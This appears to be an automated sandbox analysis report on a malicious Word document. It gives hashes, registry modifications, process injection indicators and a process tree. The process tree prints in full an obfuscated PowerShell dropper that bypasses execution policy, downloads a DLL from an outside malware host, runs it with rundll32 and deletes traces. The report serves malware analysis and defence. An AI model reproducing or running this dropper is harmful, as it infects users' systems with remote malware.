Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240220-en -
resource tags
arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system -
submitted
20-05-2024 04:19
Behavioral task
behavioral1
Sample
5d26fff174b5864a0fd899ccb8c9a3fb_JaffaCakes118.doc
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
5d26fff174b5864a0fd899ccb8c9a3fb_JaffaCakes118.doc
Resource
win10v2004-20240508-en
General
-
Target
5d26fff174b5864a0fd899ccb8c9a3fb_JaffaCakes118.doc
-
Size
392KB
-
MD5
5d26fff174b5864a0fd899ccb8c9a3fb
-
SHA1
dd8726066ddae317bb9415b994e82b8d3c89eb18
-
SHA256
54257271a5f00afb180199a38c277e9257e907407ae6d7b9e0e5e425d8fd37e0
-
SHA512
524fdc7a602a22d6a0cc662fb89ed3a69491177414f40ede8a0441e2f02292d57b505e6ba03804f413a70f825e41f1420e258128a43967257c515a7fc1ce0246
-
SSDEEP
6144:niIpBWik+MmAQoMfMWDceTo59x9r+RSwujd+Ao7pt:iIprkNmAQo0MWDcTbKQTjLott
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
xea_kueou0.exepid process 3040 xea_kueou0.exe -
Loads dropped DLL 1 IoCs
Processes:
WINWORD.EXEpid process 2284 WINWORD.EXE -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Office loads VBA resources, possible macro or embedded object present
-
Processes:
WINWORD.EXEdescription ioc process Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE -
Modifies registry class 64 IoCs
Processes:
WINWORD.EXEdescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597} WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 2284 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
xea_kueou0.exepid process 3040 xea_kueou0.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
xea_kueou0.exedescription pid process Token: SeDebugPrivilege 3040 xea_kueou0.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 2284 WINWORD.EXE 2284 WINWORD.EXE -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
WINWORD.EXExea_kueou0.exedescription pid process target process PID 2284 wrote to memory of 3040 2284 WINWORD.EXE xea_kueou0.exe PID 2284 wrote to memory of 3040 2284 WINWORD.EXE xea_kueou0.exe PID 2284 wrote to memory of 3040 2284 WINWORD.EXE xea_kueou0.exe PID 2284 wrote to memory of 3040 2284 WINWORD.EXE xea_kueou0.exe PID 2284 wrote to memory of 2888 2284 WINWORD.EXE splwow64.exe PID 2284 wrote to memory of 2888 2284 WINWORD.EXE splwow64.exe PID 2284 wrote to memory of 2888 2284 WINWORD.EXE splwow64.exe PID 2284 wrote to memory of 2888 2284 WINWORD.EXE splwow64.exe PID 3040 wrote to memory of 1384 3040 xea_kueou0.exe rundll32.exe PID 3040 wrote to memory of 1384 3040 xea_kueou0.exe rundll32.exe PID 3040 wrote to memory of 1384 3040 xea_kueou0.exe rundll32.exe PID 3040 wrote to memory of 1384 3040 xea_kueou0.exe rundll32.exe PID 3040 wrote to memory of 1384 3040 xea_kueou0.exe rundll32.exe PID 3040 wrote to memory of 1384 3040 xea_kueou0.exe rundll32.exe PID 3040 wrote to memory of 1384 3040 xea_kueou0.exe rundll32.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5d26fff174b5864a0fd899ccb8c9a3fb_JaffaCakes118.doc"1⤵
- Loads dropped DLL
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2284 -
C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exeC:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe $oaibfxvjiowlxxw_iekfpfyiuuoycid='org/CJ';$natpxmhofkbbeb_huseueei='ojqa';$owaizbpyuaoyyawtzcwqygabpqsrqeeidno4=' =';$eikoia_yblegbmybniemxea_ogwepz='e]$ojqa0';$mdroaenb_esuwo='ient).';$wvmbvwoxkjuhjt='($env:a';$mzoiuddeyajlqncmnrvpotqghzbopauau='($';$tcozygiwfcyinfvnu_euqaocnlecylzi='br';$qcyeatbinwxsmezc_hmhviayrcnolalvknuiefhjf='+ ''';$aoauapzujgioje_xidu_aaibeabsc87='.php';$okeygvmueodiuuyuz='Net';$yitmzuozoufzu_lficf_gdhpoeuqao2='$env:t';$sgagyyoabqaaaioi='k;}}Se';$cfruonrvvuhve_ixrbnpdclveyouklainlriu=' $path=';$aooajmeeiyupyyusaqxznw='Downl';$yamzywruogbpvbyuunmq97=' -Sc';$mwyzyn_vhaa_gzewtucmxgu='a+''\';$udm_ug_rphwvtreioe_jtneafrollnf_xjuwpzz='ea';$gvsudskwuyopb_kekkatmqpdqasgaegjhsvki=''',$pat';$vbsif_aeknkgtcrajatpyktombewksswo='t-';$mmwsme_kyvxu_edvejwrrwdtvuseduio_lnwi_es='%s';$ua_wybbegalseqrkkigmuueik='rmat ';$bxauxi_gdiqlvelokehc=');(Ne';$iu_ebbubieeuynqayu_rcpfykziuepqojd02='.Webcl';$ubgieohxfasnveuauyunvnyyafalf_tuf='ct S';$rlhio_vzhdxeytzwdajcaio='lcn';$c_qwtnvmm_mwitcyidseg=') -';$uymddyuwrfj_truyyqv=' = $';$ieaetbrqnosgobb='xeofiu''';$ulhqbioxuairmxscoeywdo='\g';$iiqjwpysluziyi='h); rund';$fm_lzloaflyqunl_rrvjpmd=' Ge';$kayrdaavkijoqmiiieadeowqbw='oad';$s_bvcqmepdogzwmoqwr_uscmigyassarl='; $qgyx';$uso_dl_vwzkeeskgpp_ibvewjmr='uCokZbLZ';$atke_aahgy_awuhinj_yarqjoiagbdomxcm='Ex';$ytr_ulakmoxieyuuqsa='ope P';$wmqaligua_xjensemze='le(';$uziux_cxljaau='olic';$qdkp_tslelwso_iuwnaby_np='11;whi';$upfihhmu_bruiaypxwc_nzfkbtrgtx_yujyep_jxyuu5='ate -UFo';$oauwfabx_dhpjo_iodh_ulpunmfktuavteai=' ''f1'';Re';$wtoxtvoiougt_y='re';$byadiryyayieeidgqqmjrgeactagkrpexhu='emp ';$bqgddecgsiiajzoourpmbdeayguxj='cur';$sq_aqnpeltdkhy_idwjrpgmqq_ufzty='et-Da';$ijfkefmziiwkqqxy='shops.';$ydndgjo_eeopr_fdjdezhomjqqeyeeyeyu_qb='File(''';$idrypqufftaiazps='yste';$egxtowvvxgkzyeykhonizpgwa_rjoeuanpo=' $path ,';$fsyy_cy_ydewla_a_yeifzavusld_e='ll32';$txjyexcuyf_moyzdaaylgqru='ecutionP';$aef_noyxiax_puskee='ad = G';$brraekqxipsc_u='m 4';$acgyap_iqwholxtyekmd_xoayczaumoao='0 + 11.';$tmi_hibeeyaxhueiswapcwr='y Bypass';$e_utyoesneikpukijvwxeamahf_ii='t-D';$gdzgogct_uzouwzezekvialzuqoi='ase.dll''';$uy_aywtlioixpgipyixqufajvjnfk_a='et';$kzfwuwzbhtztiihor_rhaiscfboclhe='77;if';$qpb_elgvzsl_iqmfch='lcnad -g';$kgeyoiapuoiutzvlkft_f_bnbmioasyv='eep -';$uiieeutyymuyscizu62='){';$cnyjzkyeff_uobpdkcas='t-Sl';$ei_oefjuuyalgvsyjxnewacxtxr='tem (';$iivobpybzsthaoopoisugotiiiieduhhr08='rmat';$jptjeey_kzmhoaosrugpervewfwzsvvs='[doubl';$xknnmepjaanpebhypu='ppdat';$igeoekzbisdoztezqosdyeuokg='1){ $';$vxzopznvaorxujcbx='te -UFo';$p_lmbqvpyzegfzwimu='w-Obje';$pstxzidydhkykpkknua='m.';$ieenx_au_yycve_svmhohfeaxessifksygx='se -forc';$alfwlkamnera=' %s;Star';$ao_mbuayqujiyyapwsniiue='move-I';$wcfdjjedlijj0='//groovy';$somgplgrotbymcrajk_y='e;';$yagwueilv_uavozttcstoizd_vlvgm_ia_uvjhahrp='rocess;';$lzbwawc_sfiygjoyuucrzy_aii='http:';$auijlrquyuonww_xotmtfapkxbzyaoeea64='e $qgyx'; Invoke-Expression ($jptjeey_kzmhoaosrugpervewfwzsvvs+$eikoia_yblegbmybniemxea_ogwepz+$owaizbpyuaoyyawtzcwqygabpqsrqeeidno4+$fm_lzloaflyqunl_rrvjpmd+$e_utyoesneikpukijvwxeamahf_ii+$upfihhmu_bruiaypxwc_nzfkbtrgtx_yujyep_jxyuu5+$ua_wybbegalseqrkkigmuueik+$mmwsme_kyvxu_edvejwrrwdtvuseduio_lnwi_es+$s_bvcqmepdogzwmoqwr_uscmigyassarl+$uymddyuwrfj_truyyqv+$natpxmhofkbbeb_huseueei+$acgyap_iqwholxtyekmd_xoayczaumoao+$qdkp_tslelwso_iuwnaby_np+$wmqaligua_xjensemze+$igeoekzbisdoztezqosdyeuokg+$rlhio_vzhdxeytzwdajcaio+$aef_noyxiax_puskee+$sq_aqnpeltdkhy_idwjrpgmqq_ufzty+$vxzopznvaorxujcbx+$iivobpybzsthaoopoisugotiiiieduhhr08+$alfwlkamnera+$cnyjzkyeff_uobpdkcas+$kgeyoiapuoiutzvlkft_f_bnbmioasyv+$brraekqxipsc_u+$kzfwuwzbhtztiihor_rhaiscfboclhe+$mzoiuddeyajlqncmnrvpotqghzbopauau+$qpb_elgvzsl_iqmfch+$auijlrquyuonww_xotmtfapkxbzyaoeea64+$uiieeutyymuyscizu62+$tcozygiwfcyinfvnu_euqaocnlecylzi+$udm_ug_rphwvtreioe_jtneafrollnf_xjuwpzz+$sgagyyoabqaaaioi+$vbsif_aeknkgtcrajatpyktombewksswo+$atke_aahgy_awuhinj_yarqjoiagbdomxcm+$txjyexcuyf_moyzdaaylgqru+$uziux_cxljaau+$tmi_hibeeyaxhueiswapcwr+$yamzywruogbpvbyuunmq97+$ytr_ulakmoxieyuuqsa+$yagwueilv_uavozttcstoizd_vlvgm_ia_uvjhahrp+$cfruonrvvuhve_ixrbnpdclveyouklainlriu+$wvmbvwoxkjuhjt+$xknnmepjaanpebhypu+$mwyzyn_vhaa_gzewtucmxgu+$uy_aywtlioixpgipyixqufajvjnfk_a+$gdzgogct_uzouwzezekvialzuqoi+$bxauxi_gdiqlvelokehc+$p_lmbqvpyzegfzwimu+$ubgieohxfasnveuauyunvnyyafalf_tuf+$idrypqufftaiazps+$pstxzidydhkykpkknua+$okeygvmueodiuuyuz+$iu_ebbubieeuynqayu_rcpfykziuepqojd02+$mdroaenb_esuwo+$aooajmeeiyupyyusaqxznw+$kayrdaavkijoqmiiieadeowqbw+$ydndgjo_eeopr_fdjdezhomjqqeyeeyeyu_qb+$lzbwawc_sfiygjoyuucrzy_aii+$wcfdjjedlijj0+$ijfkefmziiwkqqxy+$oaibfxvjiowlxxw_iekfpfyiuuoycid+$uso_dl_vwzkeeskgpp_ibvewjmr+$aoauapzujgioje_xidu_aaibeabsc87+$gvsudskwuyopb_kekkatmqpdqasgaegjhsvki+$iiqjwpysluziyi+$fsyy_cy_ydewla_a_yeifzavusld_e+$egxtowvvxgkzyeykhonizpgwa_rjoeuanpo+$oauwfabx_dhpjo_iodh_ulpunmfktuavteai+$ao_mbuayqujiyyapwsniiue+$ei_oefjuuyalgvsyjxnewacxtxr+$yitmzuozoufzu_lficf_gdhpoeuqao2+$byadiryyayieeidgqqmjrgeactagkrpexhu+$qcyeatbinwxsmezc_hmhviayrcnolalvknuiefhjf+$ulhqbioxuairmxscoeywdo+$ieaetbrqnosgobb+$c_qwtnvmm_mwitcyidseg+$wtoxtvoiougt_y+$bqgddecgsiiajzoourpmbdeayguxj+$ieenx_au_yycve_svmhohfeaxessifksygx+$somgplgrotbymcrajk_y);2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3040 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\etase.dll f13⤵PID:1384
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2888
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
15KB
MD5d29f635492b5b2f98d7623284899b1aa
SHA15db4c47cc44f17848b80029d8a8348cef7a5dc56
SHA2568d5de2726faeb445042196cfd80b132bf5adb2c87241f42a29c88e9d75fcb759
SHA512923d2fd2f82dda05f63d3a8ab7b091dd4a8ff5b5404171bdebc96f0401bf3d84334f0d9b6f43495656f6a7997c194ce58046d20ef31d8e24e7bb056f961a2f11
-
Filesize
25KB
MD5b335d7490dd7429bd096fee82a807008
SHA1167d0d8543f818425cefc25865b978de906aa301
SHA2561b669af68a8743144b0a2812471afd504cef88b449d91e2c2d5c58cce98328f6
SHA512c1eaa81c5ef42a6de736bcc2195fb82f0b37638ec84d1f6a421417fa87eebd0418fc642446f3cf3c831b36fbaac97d530d7e36de8ee5b47a8bd1397e0b7b022a
-
Filesize
15KB
MD52060451a52f4a9083f0f554492d7b261
SHA1346ba51823c9b0a67cbc0509adfe789b7b681a0d
SHA2565a16ce4adf1b862edf7bd253e66bfc125cd79b227729f5a0522a84d37f004858
SHA5123ac42e061aa4c104a05e24d54d256fbfb702f43d4f4bcb8b84db13f626320779f5ecb865b515a8af00b0220b5cab1c4db7ddd97c8265c4bec68655f4426138c7
-
Filesize
7KB
MD5710ff8a9e47e741f5d09c82ffcae3057
SHA12308e17617a45716e1664b591fab17227630f6b2
